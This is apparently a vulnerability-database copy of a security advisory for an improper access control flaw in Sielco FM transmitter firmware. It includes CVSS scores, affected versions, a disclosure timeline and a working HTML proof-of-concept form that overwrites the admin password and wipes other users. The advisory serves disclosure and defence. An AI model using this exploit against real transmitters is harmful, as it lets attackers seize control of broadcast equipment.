Lucene search

K
zeroscienceGjoko KrsticZSL-2023-5756
HistoryMar 28, 2023 - 12:00 a.m.

Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password

2023-03-2800:00:00
Gjoko Krstic
zeroscience.mk
153
sielco analog fm transmitter
improper access control
change admin password
security bypass
vulnerability discovered

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

18.6%

Title: Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password
Advisory ID: ZSL-2023-5756
Type: Local/Remote
Impact: Security Bypass
Risk: (4/5)
Release Date: 28.03.2023

Summary

Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Description

The application suffers from improper access control when editing users. A user with Read permissions can manipulate users, passwords and permissions by sending a single HTTP POST request with modified parameters and edit other users’ names, passwords and permissions including admin password.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)

Tested On

lwIP/2.1.1
Web/3.0.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[27.03.2023] No response from the vendor.
[27.03.2023] No response from the CSIRT team.
[28.03.2023] Public security advisory released.

PoC

sielco_fm_iac.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/51365&gt;
[2] <https://packetstormsecurity.com/files/171841/&gt;
[3] <https://cxsecurity.com/issue/WLB-2023040055&gt;
[4] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08&gt;
[5] <https://vulners.com/cve/CVE-2023-45228&gt;
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-45228&gt;
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253075&gt;
[8] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269708&gt;

Changelog

[28.03.2023] - Initial release
[02.11.2023] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--

Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from improper access control when
editing users. A user with Read permissions can manipulate users,
passwords and permissions by sending a single HTTP POST request
with modified parameters and edit other users' names, passwords
and permissions including admin password.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5756
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php


26.01.2023

--><html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input name="pwd0" type="hidden" value="PWDCHANGED"/> <!-- This will set/modify admin pwd -->
<input name="pwd0bis" type="hidden" value="PWDCHANGED"/> <!-- This will set/modify admin pwd -->
<input name="user1" type="hidden" value=""/> <!-- This will set/modify user1 -->
<input name="pwd1" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="pwd1bis" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="auth1" type="hidden" value="0"/> <!-- This will set user1 read perm -->
<input name="user2" type="hidden" value=""/> <!-- This will set/modify user2 -->
<input name="pwd2" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="pwd2bis" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="auth2" type="hidden" value="0"/> <!-- This will set user2 read perm -->
<input name="user3" type="hidden" value=""/> <!-- This will set/modify user3 -->
<input name="pwd3" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="pwd3bis" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="auth3" type="hidden" value="0"/> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users"/>
</form>
</body>
</html>

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

18.6%